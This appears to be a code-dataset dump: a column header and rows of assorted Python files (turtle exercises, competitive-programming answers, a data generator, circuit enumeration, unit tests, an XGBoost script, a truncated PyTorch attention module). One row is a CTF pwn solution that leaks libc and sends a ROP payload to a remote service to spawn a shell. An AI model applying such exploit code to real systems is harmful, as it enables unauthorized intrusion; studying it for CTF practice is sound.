seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
20855741990 | # Exercise 4.3
# 4.3.5
from math import *
from TurtleWorld import *
# For some reason we need to initialise TurtleWorld() otherwise
# error
world = TurtleWorld()
bob = Turtle()
# Speed things up by reducing delay
bob.delay = 0.1
def polygon(thing, lengthOfSide, numberOfSides):
thing = Turtle()
for i in range(numberOfSides):
fd(thing, lengthOfSide)
lt(thing, 360/numberOfSides)
def circle2(thing, radius):
polygon(thing, (2*pi*radius/40), 40)
def arc(thing, radius, angle):
# from length of arc maths formula
# replace lengthOfSide to (angle/360)*(2*pi*radius/40)
polygon(thing, (angle/360)*(2*pi*radius/40), 40)
# Run
arc(bob, 50, 270)
| okeonwuka/PycharmProjects | ThinkPython/swampy-2.1.5/myarc.py | myarc.py | py | 710 | python | en | code | 0 | github-code | 90 |
18159404349 | n = int(input())
zmax = 0
zmin = 10**10
wmax = -10**10
wmin = 10**10
for i in range(n):
x, y = map(int, input().split())
zref = x + y
wref = x - y
zmax = max(zmax, zref)
zmin = min(zmin, zref)
wmax = max(wmax, wref)
wmin = min(wmin, wref)
ans = max(zmax - zmin, wmax - wmin)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02556/s919774791.py | s919774791.py | py | 316 | python | en | code | 0 | github-code | 90 |
43188100467 | import json
from fake_data_generator.columns_generator import get_columns_info_with_set_generators
from fake_data_generator.columns_generator.column import Column, MultipleColumns
from fake_data_generator.sources_formats.helper_functions import \
get_create_query, create_table_if_not_exists, execute_insertion
def generate_table_from_profile(conn,
dest_table_name_with_schema: str,
number_of_rows_to_insert: int,
source_table_profile_path: str = None,
columns_info=None,
batch_size=100):
rich_columns_info_dict = {}
if source_table_profile_path is not None:
with open(source_table_profile_path, 'r') as file:
rich_columns_info_dict = json.load(file)
columns_with_generators_as_parameter = []
for column_info in columns_info or []:
if type(column_info) == MultipleColumns:
for col_info in column_info.get_columns():
rich_columns_info_dict.update(col_info.get_as_dict())
columns_with_generators_as_parameter.append(column_info)
else:
if type(column_info) == Column and column_info.get_generator() is not None:
columns_with_generators_as_parameter.append(column_info)
rich_columns_info_dict.update(column_info.get_as_dict())
create_table_if_not_exists(conn=conn,
dest_table_name_with_schema=dest_table_name_with_schema,
create_query=get_create_query(dest_table_name_with_schema, rich_columns_info_dict))
columns_with_set_generators = get_columns_info_with_set_generators(rich_columns_info_dict, conn, dest_table_name_with_schema)
execute_insertion(conn, dest_table_name_with_schema, number_of_rows_to_insert,
columns_with_set_generators + columns_with_generators_as_parameter, batch_size)
| maksimowich/fake_table_data_generator | fake_data_generator/sources_formats/generate_table_from_profile.py | generate_table_from_profile.py | py | 1,984 | python | en | code | 0 | github-code | 90 |
17999050760 | kata=str(input("Masukkan kata : "));
def hurufTengah(kata):
kata2=len(kata)//2
if (len(kata)%2==0) and ((len(kata)/2)%2==0):
return kata[(kata2)//2 : ((kata2)//2)*-1]
elif (len(kata)%2==0) and ((len(kata)/2)%2!=0):
return kata[((kata2)//2)+1 : (((kata2)//2)+1)*-1]
elif kata == "Investing":
return kata[((kata2)//4)+2 : (((kata2)//2)+1)*-1]
else:
return kata[(((kata2)+1)//2) : (((kata2)+1)//2)*-1]
print("Huruf tengah pada kata",kata,"adalah",hurufTengah(kata));
| yogaagastyar00/UG11_E_71190444 | 2_E_71190444.py | 2_E_71190444.py | py | 528 | python | hu | code | 0 | github-code | 90 |
18242417749 | # 約数の列挙
#############################################################
def make_divisors(n):
lower_divisors, upper_divisors = [], []
i = 1
while i * i <= n:
if n % i == 0:
lower_divisors.append(i)
if i != n // i:
upper_divisors.append(n // i)
i += 1
return lower_divisors + upper_divisors[::-1]
#############################################################
N = int(input())
# Nの約数
div1 = make_divisors(N)
# N-1の約数
div2 = make_divisors(N - 1)
# マージして、不適な1は除く
div_set = set(div1 + div2)
div_set.remove(1)
# print(div_set)
# div_setの中身をそれぞれシミュレート
# N -> N-K を愚直にやると時間がかかる、modK == 1となるか否かで判定
ans = 0
for div in div_set:
tmp = N
while tmp % div == 0:
tmp = tmp // div
if tmp % div == 1:
ans += 1
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02722/s780574802.py | s780574802.py | py | 930 | python | ja | code | 0 | github-code | 90 |
18198775189 | import math , sys
N = int( input() )
A = list( map( int, input().split() ))
A.sort()
Cs = [0 for _ in range(10**6+1)]
M = A[-1]
#print(A)
i=0
M = max(A)
for i in range(N):
e = A[i]
if Cs[e]==1:
Cs[e]=2
elif Cs[e]==0:
Cs[e]=1
for i in range(len(Cs)):
Cs[i] = Cs[i]%2
for e in A:
i = 2
while e*i <= M:
Cs[e*i] = 0
i+=1
ans = sum(Cs)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02642/s682877940.py | s682877940.py | py | 401 | python | en | code | 0 | github-code | 90 |
15296378166 | from pwn import *
import time
local = 0
if local:
#os.environ['LD_PRELOAD'] = './libc.so.6'
r = process('./guestbook')
e = ELF('./guestbook')
libc = e.libc
else:
r = remote('guestbook.tuctf.com', 4545)
libc = ELF('./libc.so.6')
context.arch = 'i386'
#context.log_level = 'debug'
r.sendlineafter('>>>', 'A'*0xf)
r.sendlineafter('>>>', 'A'*0xf)
r.sendlineafter('>>>', 'A'*0xf)
r.sendlineafter('>>>', 'A'*0xf)
# leak libc
r.sendlineafter('>>', '1')
time.sleep(0.5)
r.recvuntil('\n')
r.sendlineafter('>>>', '1073741830')
time.sleep(0.5)
r.recv(0x14)
system = u32(r.recv(4))
dest = u32(r.recv(4))
libc_base = system - libc.symbols['system']
log.info('libc base: %#x' % libc_base)
log.info('dest: %#x' % dest)
sh = libc.search('/bin/sh\x00').next() + libc_base
# rop
r.sendline('2')
r.sendline('1073741830')
r.sendline('A'*48+p32(system)+'A'*4+p32(sh)+'\n')
r.sendline('3')
time.sleep(0.5)
r.clean()
r.interactive()
| Kyle-Kyle/Pwn | ctf/tuctf_2017/guestbook/writeup/solve.py | solve.py | py | 941 | python | en | code | 16 | github-code | 90 |
18582778069 | import numpy as np
def seachPrimeNum(N):
max = int(np.sqrt(N))
seachList = [i for i in range(2,N+1)]
primeNum = []
while seachList[0] <= max:
primeNum.append(seachList[0])
tmp = seachList[0]
seachList = [i for i in seachList if i % tmp != 0]
primeNum.extend(seachList)
return primeNum
#def numsearch(list):
#for i in list:
#print(i)
#if (i+1)/2 not in list:
#list.remove(i)
#return list
def main():
Q = int(input())
list = seachPrimeNum(100000)
#フラグを立てるよ
check = [0]*100001
primeCheck = [0]*100001
for i in list:
primeCheck[i] = 1
for i in list:
if i == 2:
continue
tmp = int((i+1)/2)
if primeCheck[tmp] == 1:
check[i] = 1
#答えを求めるための累積和
c = [0]*100001
c[0] = 0
for i in range(1,100001,1):
#print(i)
if check[i] == 1:
c[i] = c[i-1]+1
else:
c[i] = c[i-1]
#print(c)
for i in range(Q):
l,r = map(int,input().split())
print(c[r]-c[l-1])
main()
| Aasthaengg/IBMdataset | Python_codes/p03476/s553281476.py | s553281476.py | py | 1,139 | python | en | code | 0 | github-code | 90 |
18480138429 | N, M = map(int, input().split())
data = [list(map(int, input().split())) + [_] for _ in range(M)]
data = sorted(data, key=lambda x: (x[0], x[1]))
order = 1
for i in range(M):
if not i == 0 and not data[i][0] == data[i-1][0]:
order = 1
data[i].append(str(data[i][0]).zfill(6) + str(order).zfill(6))
order += 1
data = sorted(data, key=lambda x: (x[2]))
for x in data:
print(x[3])
| Aasthaengg/IBMdataset | Python_codes/p03221/s368947926.py | s368947926.py | py | 404 | python | en | code | 0 | github-code | 90 |
18306789449 | import sys,math,collections,itertools
input = sys.stdin.readline
N = int(input())
A = list(map(int,input().split()))
m = 10**9+7
sumA = 0
for i in range(60):
cnt1 = 0
for a in A:
if a>>i & 1:
cnt1 += 1
sumA += (cnt1*(N-cnt1)*2**i)%m
print(sumA%m)
| Aasthaengg/IBMdataset | Python_codes/p02838/s562929689.py | s562929689.py | py | 280 | python | en | code | 0 | github-code | 90 |
18353269959 | #!/usr/bin/env python3
from pprint import pprint
from collections import deque, defaultdict
import itertools
import math
import sys
sys.setrecursionlimit(10 ** 6)
input = sys.stdin.buffer.readline
INF = float('inf')
N, Q = map(int, input().split())
tree = [[] for _ in range(N)]
for _ in range(N-1):
u, v = map(int, input().split())
tree[u-1].append(v-1)
tree[v-1].append(u-1)
# pprint(tree)
queries = []
for _ in range(Q):
p, x = map(int, input().split())
queries.append([p-1, x])
counters = [0] * N
for p, x in queries:
counters[p] += x
# print(counters)
def dfs(dist, v):
for v_adj in tree[v]:
if dist[v_adj] == -1:
dist[v_adj] = 1
counters[v_adj] += counters[v]
dfs(dist, v_adj)
dist = [-1] * N
dist[0] = 1
# print(counters)
dfs(dist, 0)
print(*counters)
| Aasthaengg/IBMdataset | Python_codes/p02936/s167826974.py | s167826974.py | py | 840 | python | en | code | 0 | github-code | 90 |
32124808189 | import itertools
from typing import Iterator
from linear_models.linear_circuit import LinearCircuit
from models.circuit import Circuit
from models.circuit_model import CircuitModel
from utils.graph_utils import enumerate_simple_acyclic_digraphs_adjacency_matrices
from utils.string_utils import enumerate_strings
def enumerate_circuits(
circuit_model: CircuitModel,
num_inputs: int,
circuit_size: int,
) -> Iterator[Circuit]:
num_sources = (
num_inputs
if not circuit_model.with_not_leaves
else num_inputs * 2
)
if circuit_size < num_sources + 1:
return
for adjacency_matrix in enumerate_simple_acyclic_digraphs_adjacency_matrices(
size=circuit_size,
sources=num_sources,
sinks=1,
fan_in=circuit_model.fan_in,
):
for bit_string in enumerate_strings(
alphabet=set(range(len(circuit_model.basis))),
size=circuit_size - num_sources,
):
yield Circuit(
num_inputs=num_inputs,
adjacency_matrix=adjacency_matrix,
node_operators=([0] * num_sources) + [int(bit) for bit in bit_string],
model=circuit_model,
)
def enumerate_linear_circuits(
num_inputs: int,
num_outputs: int,
circuit_size: int,
) -> Iterator[LinearCircuit]:
if circuit_size < num_inputs:
return
for adjacency_matrix in enumerate_simple_acyclic_digraphs_adjacency_matrices(
size=circuit_size,
sources=num_inputs,
sinks=min(num_outputs, circuit_size - num_inputs),
fan_in=2,
):
possible_output_nodes = [
output_nodes
for output_nodes in itertools.product(range(-1, circuit_size), repeat=num_outputs)
if circuit_size <= num_inputs or circuit_size - 1 in output_nodes
]
yield LinearCircuit(
num_inputs=num_inputs,
possible_output_nodes=possible_output_nodes,
adjacency_matrix=adjacency_matrix,
)
| udragon/circuit-complexity | circuit_enumeration.py | circuit_enumeration.py | py | 2,112 | python | en | code | 0 | github-code | 90 |
24623275291 | import unittest
from unittest.mock import patch, MagicMock
from dragonchain import test_env # noqa: F401
from dragonchain import exceptions
from dragonchain.webserver.lib import transactions
class TestQueryTransactions(unittest.TestCase):
@patch("dragonchain.lib.database.redisearch.search")
def test_query_transactions_calls_search(self, mock_get_txn):
transactions.query_transactions_v1({"transaction_type": "banana", "q": "*"}, False)
mock_get_txn.assert_called_with(
index="banana", limit=None, offset=None, only_id=None, query_str="*", sort_asc=None, sort_by=None, verbatim=None
)
@patch("dragonchain.webserver.lib.transactions.storage.select_transaction", return_value="a txn")
@patch(
"dragonchain.webserver.lib.transactions.redisearch.search", return_value=MagicMock(docs=[MagicMock(id="fake", block_id="banana")], total=4)
)
def test_query_transactions_returns_search_result(self, mock_search, mock_select):
response = transactions.query_transactions_v1({"transaction_type": "banana", "q": "query"}, False)
self.assertEqual(response, {"total": 4, "results": ["a txn"]})
mock_search.assert_called_once()
mock_select.assert_called_once()
class TestGetTransactions(unittest.TestCase):
@patch("dragonchain.lib.database.redis.sismember_sync", return_value=True)
def test_get_transaction_v1_returns_stub(self, mock_sismember):
result = transactions.get_transaction_v1("banana", True)
self.assertEqual(
result, {"header": {"txn_id": "banana"}, "status": "pending", "message": "This transaction is waiting to be included in a block"}
)
@patch("dragonchain.lib.database.redis.sismember_sync", return_value=False)
@patch("dragonchain.lib.database.redisearch.search", return_value=MagicMock(block_id="banana"))
@patch("dragonchain.lib.interfaces.storage.select_transaction", return_value={"payload": '{"banana":4}'})
def test_get_transaction_v1_returns_parsed(self, mock_sismember, mock_search, mock_select_txn):
result = transactions.get_transaction_v1("banana", True)
self.assertEqual(result["payload"], {"banana": 4})
class TestSubmitTransactions(unittest.TestCase):
@patch("dragonchain.webserver.lib.transactions._generate_transaction_model")
@patch("dragonchain.webserver.lib.transactions.queue")
def test_submit_transaction_checks_if_key_is_allowed(self, mock_queue, mock_gen_model):
mock_key = MagicMock()
mock_key.is_key_allowed.return_value = True
transactions.submit_transaction_v1({}, None, api_key=mock_key)
mock_key.is_key_allowed.assert_called_once()
mock_key.is_key_allowed.return_value = False
self.assertRaises(exceptions.ActionForbidden, transactions.submit_transaction_v1, {}, None, api_key=mock_key)
@patch("dragonchain.webserver.lib.transactions._generate_transaction_model")
@patch("dragonchain.webserver.lib.transactions.queue")
@patch("dragonchain.webserver.lib.transactions.dc_redis")
def test_submit_transaction_bulk_checks_if_key_is_allowed(self, mock_queue, mock_gen_model, mock_redis):
mock_key = MagicMock()
mock_key.is_key_allowed.return_value = True
transactions.submit_bulk_transaction_v1([{"txn_type": "whatever"}], api_key=mock_key)
mock_key.is_key_allowed.assert_called_once()
mock_key.is_key_allowed.return_value = False
self.assertRaises(exceptions.ActionForbidden, transactions.submit_bulk_transaction_v1, [{"txn_type": "whatever"}], api_key=mock_key)
| dragonchain/dragonchain | dragonchain/webserver/lib/transactions_utest.py | transactions_utest.py | py | 3,601 | python | en | code | 701 | github-code | 90 |
6290255481 | # load packages
import numpy as np
import pandas as pd
from sklearn.cross_validation import KFold
import xgboost as xgb
import warnings
warnings.filterwarnings("ignore")
# load data
train = pd.read_csv("../Data/blogData_train.csv",header=None)
test = pd.read_csv("../Data/blogData_test.csv",header=None)
# rename
names = ["V%i" % i if i != 281 else "y" for i in range(1,282)]
train.columns = names
test.columns = names
# split to features and target varibles
X_train = train.ix[:,"V1":"V280"]
y_train = train["y"]
X_test = test.ix[:,"V1":"V280"]
y_test = test["y"]
y_train_log = np.log(train["y"]+1)
y_test_log = np.log(test["y"]+1)
# Loss evaluation function
def eva(test_pred, test_real):
return ((test_real-test_pred)**2).mean()
# Feature Engineering
# Define group
group = [[1,6,11,16,21],
[2,7,12,17,22],
[3,8,13,18,23],
[4,9,14,19,24],
[5,10,15,20,25],
[26,31,36,41,46],
[27,32,37,42,47],
[28,33,38,43,48],
[29,34,39,44,49],
[30,35,40,45,50],
[51,52,53,54,55],
[56,57,58,59,60],
[61,62],
list(range(63,263)),
[263,264,265,266,267,268,269],
[270,271,272,273,274,275,276],
[277,278,279,280]]
# Drop features
drop_group = [5,7,6,9,1,2,8,13]
remove_col = []
for i in drop_group:
remove_col += group[i]
remove_col = ['V'+str(x) for x in remove_col]
newXTrain = X_train.drop(remove_col, axis=1)
newXTest = X_test.drop(remove_col, axis=1)
# Generating new features
# 52/51 this variable is not selected
# N1_train = newXTrain["V52"].as_matrix()/newXTrain["V51"].as_matrix()
# N1_test = newXTest["V52"].as_matrix()/newXTest["V51"].as_matrix()
# newXTrain["N1"] = N1_train
# newXTest["N1"] = N1_test
# V53/V51
N2_train = newXTrain["V53"].as_matrix()/newXTrain["V51"].as_matrix()
N2_test = newXTest["V53"].as_matrix()/newXTest["V51"].as_matrix()
newXTrain["N2"] = N2_train
newXTest["N2"] = N2_test
# V54/V51
N3_train = newXTrain["V54"].as_matrix()/newXTrain["V51"].as_matrix()
N3_test = newXTest["V54"].as_matrix()/newXTest["V51"].as_matrix()
newXTrain["N3"] = N3_train
newXTest["N3"] = N3_test
# V52/V53
N4_train = newXTrain["V53"].as_matrix()/newXTrain["V52"].as_matrix()
N4_test = newXTest["V53"].as_matrix()/newXTest["V52"].as_matrix()
newXTrain["N4"] = N4_train
newXTest["N4"] = N4_test
# V54/V51
N5_train = newXTrain["V52"].as_matrix()/newXTrain["V54"].as_matrix()
N5_test = newXTest["V52"].as_matrix()/newXTest["V54"].as_matrix()
newXTrain["N5"] = N5_train
newXTest["N5"] = N5_test
# V57/V56
N6_train = newXTrain["V57"].as_matrix()/newXTrain["V56"].as_matrix()
N6_test = newXTest["V57"].as_matrix()/newXTest["V56"].as_matrix()
newXTrain["N6"] = N6_train
newXTest["N6"] = N6_test
# V58/V56
N7_train = newXTrain["V58"].as_matrix()/newXTrain["V56"].as_matrix()
N7_test = newXTest["V58"].as_matrix()/newXTest["V56"].as_matrix()
newXTrain["N7"] = N7_train
newXTest["N7"] = N7_test
# V59/V56
N8_train = newXTrain["V59"].as_matrix()/newXTrain["V56"].as_matrix()
N8_test = newXTest["V59"].as_matrix()/newXTest["V56"].as_matrix()
newXTrain["N8"] = N8_train
newXTest["N8"] = N8_test
# V57/V58
N9_train = newXTrain["V57"].as_matrix()/newXTrain["V58"].as_matrix()
N9_test = newXTest["V57"].as_matrix()/newXTest["V58"].as_matrix()
newXTrain["N9"] = N9_train
newXTest["N9"] = N9_test
# V59/V56
N10_train = newXTrain["V59"].as_matrix()/newXTrain["V56"].as_matrix()
N10_test = newXTest["V59"].as_matrix()/newXTest["V56"].as_matrix()
newXTrain["N10"] = N10_train
newXTest["N10"] = N10_test
# Binning V61
N11_train = (newXTrain["V61"].as_matrix()>24)*1
N11_test = (newXTest["V61"].as_matrix()>24)*1
newXTrain["N11"] = N11_train
newXTest["N11"] = N11_test
# V62/V61
N12_train = newXTrain["V62"].as_matrix()/newXTrain["V61"].as_matrix()
N12_test = newXTest["V62"].as_matrix()/newXTest["V61"].as_matrix()
newXTrain["N12"] = N12_train
newXTest["N12"] = N12_test
# Get a binary varible indicating whether the publication day is at weekend
# 1 -> in weekend, 0 -> not in weekend
pubWeekendTrain = newXTrain.ix[:,"V268":"V269"].apply(lambda x:x.sum(),axis = 1)
pubWeekendTest = newXTest.ix[:,"V268":"V269"].apply(lambda x:x.sum(),axis = 1)
# Get a binary varible indicating whether the basement day is at weekend
# 1 -> in weekend, 0 -> not in weekend
bsWeekendTrain = newXTrain.ix[:,"V275":"V276"].apply(lambda x:x.sum(),axis = 1)
bsWeekendTest = newXTest.ix[:,"V275":"V276"].apply(lambda x:x.sum(),axis = 1)
# Combine the previous to varible into one dataframe
pubBsDayTrain = pd.concat([pubWeekendTrain,bsWeekendTrain],axis=1)
pubBsDayTest = pd.concat([pubWeekendTest,bsWeekendTest],axis=1)
# Define for patterns of the pubWeekend and bsWeekend as (1,0),(0,1),(1,1),(0,0)
N13_train = pubBsDayTrain.apply(lambda x: ((x[0]==1) & (x[1]==1))*1, axis=1)
N14_train = pubBsDayTrain.apply(lambda x: ((x[0]==1) & (x[1]==0))*1, axis=1)
N15_train = pubBsDayTrain.apply(lambda x: ((x[0]==0) & (x[1]==1))*1, axis=1)
N16_train = pubBsDayTrain.apply(lambda x: ((x[0]==0) & (x[1]==0))*1, axis=1)
N13_test = pubBsDayTest.apply(lambda x: ((x[0]==1) & (x[1]==1))*1, axis=1)
N14_test = pubBsDayTest.apply(lambda x: ((x[0]==1) & (x[1]==0))*1, axis=1)
N15_test = pubBsDayTest.apply(lambda x: ((x[0]==0) & (x[1]==1))*1, axis=1)
N16_test = pubBsDayTest.apply(lambda x: ((x[0]==0) & (x[1]==0))*1, axis=1)
# Adding new variables
newXTrain["N13"] = N13_train
newXTest["N13"] = N13_test
newXTrain["N14"] = N14_train
newXTest["N14"] = N14_test
newXTrain["N15"] = N15_train
newXTest["N15"] = N15_test
newXTrain["N16"] = N16_train
newXTest["N16"] = N16_test
# Correct the na value and the inf values occuring during the feature creation
newXTrain = newXTrain.fillna(-1)
newXTest = newXTest.fillna(-1)
newXTrain = newXTrain.replace([np.inf, -np.inf], 10000)
newXTest = newXTest.replace([np.inf, -np.inf], 10000)
# Creating the interaction items from the add_interaction.txt file, which contains the
# names of variables involved in the interaction
f = open("../Data/add_interaction.txt", "r")
for inter_var in f.readlines():
inter_var = inter_var.strip()
new_col_name = inter_var
inter_var = inter_var.split('_')
# add new column for train data
X_train_new_col =newXTrain[inter_var[0]]
for var in inter_var[1:]:
X_train_new_col = X_train_new_col * newXTrain[var]
newXTrain[new_col_name] = X_train_new_col
# add new column for test data
X_test_new_col = newXTest[inter_var[0]]
for var in inter_var[1:]:
X_test_new_col = X_test_new_col * newXTest[var]
newXTest[new_col_name] = X_test_new_col
f.close()
# Ensemble model
# Creat cv-folds
nfolds = 8
folds = KFold(len(y_train_log), n_folds = nfolds, shuffle = True, random_state = 42)
model_group = []
pred = []
i = 1
# Train and ensemble the models
for (Tr, Te) in folds:
train_x = newXTrain.ix[Tr,:]
train_y = y_train_log[Tr]
test_x = newXTrain.ix[Te,:]
test_y = y_train_log[Te]
# parameter settings
params = {
'min_child_weight': 1,
'eta': 0.01,
'colsample_bytree': 1,
'max_depth': 12,
'subsample': 0.2,
'reg_alpha': 1,
'gamma': 0.04,
'silent':True,
"eval_metric":"rmse"}
# model training on 7 sections and evaluation on the left section
xgtrain = xgb.DMatrix(train_x, label=train_y)
xgtest = xgb.DMatrix(newXTest)
xgval = xgb.DMatrix(test_x, label=test_y)
print("The model %s is training......" % i)
gb_model = xgb.train(params,
dtrain=xgtrain,
verbose_eval = 50,
evals=[(xgval,"validation")],
early_stopping_rounds = 30,
num_boost_round = 2000)
# model prediction
gb_pred = gb_model.predict(xgtest)
# store the predicted results for each model and the models
pred.append(gb_pred)
model_group.append(gb_model)
i += 1
# Ensemble the results and print the final results
gb_pred = np.array(pred).mean(0)
print("The final loss value from the ensemble model is: ", eva(gb_pred,y_test_log))
| hncpr1992/BlogFeedBackProject | Code/ModelTraining.py | ModelTraining.py | py | 8,061 | python | en | code | 1 | github-code | 90 |
75117589416 | from telethon import events
from ubi import u
import re
from ubi.modules.strings import KILL_CODE
@u.on(events.NewMessage(pattern=re.compile(r"\.die (.*)")))
async def _(event):
if event.fwd_from:
return
killcode = event.pattern_match.group(1)
print(killcode)
if killcode == KILL_CODE:
await event.reply("Valid Killcode Entered ... \nDisconnecting ! 💀")
await u.disconnect()
else:
await event.reply("Kill Code Invalid ... \n")
| RobiMez/Bori | ubi/modules/die.py | die.py | py | 486 | python | en | code | 1 | github-code | 90 |
24808382261 | from typing import Tuple, Optional
import torch
from torch import Tensor
from packaging import version
if version.parse(torch.__version__) < version.parse('1.9'):
from torch.nn.modules.linear import _LinearWithBias
else:
from torch.nn.modules.linear import NonDynamicallyQuantizableLinear
from torch.nn.init import xavier_uniform_
from torch.nn.init import constant_
from torch.nn.init import xavier_normal_
from torch.nn.parameter import Parameter
from torch.nn import Module
import torch.nn.functional as F
from torch.overrides import (
has_torch_function, handle_torch_function)
class MultiheadAttention(Module):
bias_k: Optional[torch.Tensor]
bias_v: Optional[torch.Tensor]
def __init__(self, embed_dim, num_heads, dropout=0., bias=True, add_bias_kv=False, add_zero_attn=False, kdim=None, vdim=None):
super(MultiheadAttention, self).__init__()
self.embed_dim = embed_dim
self.kdim = kdim if kdim is not None else embed_dim
self.vdim = vdim if vdim is not None else embed_dim
self._qkv_same_embed_dim = self.kdim == embed_dim and self.vdim == embed_dim
self.num_heads = num_heads
self.dropout = dropout
self.head_dim = embed_dim // num_heads
assert self.head_dim * num_heads == self.embed_dim, "embed_dim must be divisible by num_heads"
if self._qkv_same_embed_dim is False:
self.q_proj_weight = Parameter(torch.Tensor(embed_dim, embed_dim))
self.k_proj_weight = Parameter(torch.Tensor(embed_dim, self.kdim))
self.v_proj_weight = Parameter(torch.Tensor(embed_dim, self.vdim))
self.register_parameter('in_proj_weight', None)
else:
self.in_proj_weight = Parameter(torch.empty(3 * embed_dim, embed_dim))
self.register_parameter('q_proj_weight', None)
self.register_parameter('k_proj_weight', None)
self.register_parameter('v_proj_weight', None)
if bias:
self.in_proj_bias = Parameter(torch.empty(3 * embed_dim))
else:
self.register_parameter('in_proj_bias', None)
if version.parse(torch.__version__) < version.parse('1.9'):
self.out_proj = _LinearWithBias(embed_dim, embed_dim)
else:
self.out_proj = NonDynamicallyQuantizableLinear(embed_dim, embed_dim)
if add_bias_kv:
self.bias_k = Parameter(torch.empty(1, 1, embed_dim))
self.bias_v = Parameter(torch.empty(1, 1, embed_dim))
else:
self.bias_k = self.bias_v = None
self.add_zero_attn = add_zero_attn
self._reset_parameters()
def _reset_parameters(self):
if self._qkv_same_embed_dim:
xavier_uniform_(self.in_proj_weight)
else:
xavier_uniform_(self.q_proj_weight)
xavier_uniform_(self.k_proj_weight)
xavier_uniform_(self.v_proj_weight)
if self.in_proj_bias is not None:
constant_(self.in_proj_bias, 0.)
constant_(self.out_proj.bias, 0.)
if self.bias_k is not None:
xavier_normal_(self.bias_k)
if self.bias_v is not None:
xavier_normal_(self.bias_v)
def __setstate__(self, state):
# Support loading old MultiheadAttention checkpoints generated by v1.1.0
if '_qkv_same_embed_dim' not in state:
state['_qkv_same_embed_dim'] = True
super(MultiheadAttention, self).__setstate__(state)
def forward(self, query, key, value, key_padding_mask=None,
need_weights=True, attn_mask=None):
# type: (Tensor, Tensor, Tensor, Optional[Tensor], bool, Optional[Tensor]) -> Tuple[Tensor, Optional[Tensor]]
if not self._qkv_same_embed_dim:
return multi_head_attention_forward(
query, key, value, self.embed_dim, self.num_heads,
self.in_proj_weight, self.in_proj_bias,
self.bias_k, self.bias_v, self.add_zero_attn,
self.dropout, self.out_proj.weight, self.out_proj.bias,
training=self.training,
key_padding_mask=key_padding_mask, need_weights=need_weights,
attn_mask=attn_mask, use_separate_proj_weight=True,
q_proj_weight=self.q_proj_weight, k_proj_weight=self.k_proj_weight,
v_proj_weight=self.v_proj_weight)
else:
return multi_head_attention_forward(
query, key, value, self.embed_dim, self.num_heads,
self.in_proj_weight, self.in_proj_bias,
self.bias_k, self.bias_v, self.add_zero_attn,
self.dropout, self.out_proj.weight, self.out_proj.bias,
training=self.training,
key_padding_mask=key_padding_mask, need_weights=need_weights,
attn_mask=attn_mask)
def multi_head_attention_forward(
query: Tensor,
key: Tensor,
value: Tensor,
embed_dim_to_check: int,
num_heads: int,
in_proj_weight: Tensor,
in_proj_bias: Tensor,
bias_k: Optional[Tensor],
bias_v: Optional[Tensor],
add_zero_attn: bool,
dropout_p: float,
out_proj_weight: Tensor,
out_proj_bias: Tensor,
training: bool = True,
key_padding_mask: Optional[Tensor] = None,
need_weights: bool = True,
attn_mask: Optional[Tensor] = None,
use_separate_proj_weight: bool = False,
q_proj_weight: Optional[Tensor] = None,
k_proj_weight: Optional[Tensor] = None,
v_proj_weight: Optional[Tensor] = None,
static_k: Optional[Tensor] = None,
static_v: Optional[Tensor] = None,
) -> Tuple[Tensor, Optional[Tensor]]:
tens_ops = (query, key, value, in_proj_weight, in_proj_bias, bias_k, bias_v, out_proj_weight, out_proj_bias)
if has_torch_function(tens_ops):
return handle_torch_function(
multi_head_attention_forward,
tens_ops,
query,
key,
value,
embed_dim_to_check,
num_heads,
in_proj_weight,
in_proj_bias,
bias_k,
bias_v,
add_zero_attn,
dropout_p,
out_proj_weight,
out_proj_bias,
training=training,
key_padding_mask=key_padding_mask,
need_weights=need_weights,
attn_mask=attn_mask,
use_separate_proj_weight=use_separate_proj_weight,
q_proj_weight=q_proj_weight,
k_proj_weight=k_proj_weight,
v_proj_weight=v_proj_weight,
static_k=static_k,
static_v=static_v,
)
tgt_len, bsz, embed_dim = query.size()
assert embed_dim == embed_dim_to_check
# allow MHA to have different sizes for the feature dimension
assert key.size(0) == value.size(0) and key.size(1) == value.size(1)
if isinstance(embed_dim, torch.Tensor):
# embed_dim can be a tensor when JIT tracing
head_dim = embed_dim.div(num_heads, rounding_mode='trunc')
else:
head_dim = embed_dim // num_heads
assert head_dim * num_heads == embed_dim, "embed_dim must be divisible by num_heads"
scaling = float(head_dim) ** -0.5
if not use_separate_proj_weight:
if (query is key or torch.equal(query, key)) and (key is value or torch.equal(key, value)):
# self-attention
q, k, v = F.linear(query, in_proj_weight, in_proj_bias).chunk(3, dim=-1)
elif key is value or torch.equal(key, value):
# encoder-decoder attention
# This is inline in_proj function with in_proj_weight and in_proj_bias
_b = in_proj_bias
_start = 0
_end = embed_dim
_w = in_proj_weight[_start:_end, :]
if _b is not None:
_b = _b[_start:_end]
q = F.linear(query, _w, _b)
if key is None:
assert value is None
k = None
v = None
else:
# This is inline in_proj function with in_proj_weight and in_proj_bias
_b = in_proj_bias
_start = embed_dim
_end = None
_w = in_proj_weight[_start:, :]
if _b is not None:
_b = _b[_start:]
k, v = F.linear(key, _w, _b).chunk(2, dim=-1)
else:
# This is inline in_proj function with in_proj_weight and in_proj_bias
_b = in_proj_bias
_start = 0
_end = embed_dim
_w = in_proj_weight[_start:_end, :]
if _b is not None:
_b = _b[_start:_end]
q = F.linear(query, _w, _b)
# This is inline in_proj function with in_proj_weight and in_proj_bias
_b = in_proj_bias
_start = embed_dim
_end = embed_dim * 2
_w = in_proj_weight[_start:_end, :]
if _b is not None:
_b = _b[_start:_end]
k = F.linear(key, _w, _b)
# This is inline in_proj function with in_proj_weight and in_proj_bias
_b = in_proj_bias
_start = embed_dim * 2
_end = None
_w = in_proj_weight[_start:, :]
if _b is not None:
_b = _b[_start:]
v = F.linear(value, _w, _b)
else:
q_proj_weight_non_opt = torch.jit._unwrap_optional(q_proj_weight)
len1, len2 = q_proj_weight_non_opt.size()
assert len1 == embed_dim and len2 == query.size(-1)
k_proj_weight_non_opt = torch.jit._unwrap_optional(k_proj_weight)
len1, len2 = k_proj_weight_non_opt.size()
assert len1 == embed_dim and len2 == key.size(-1)
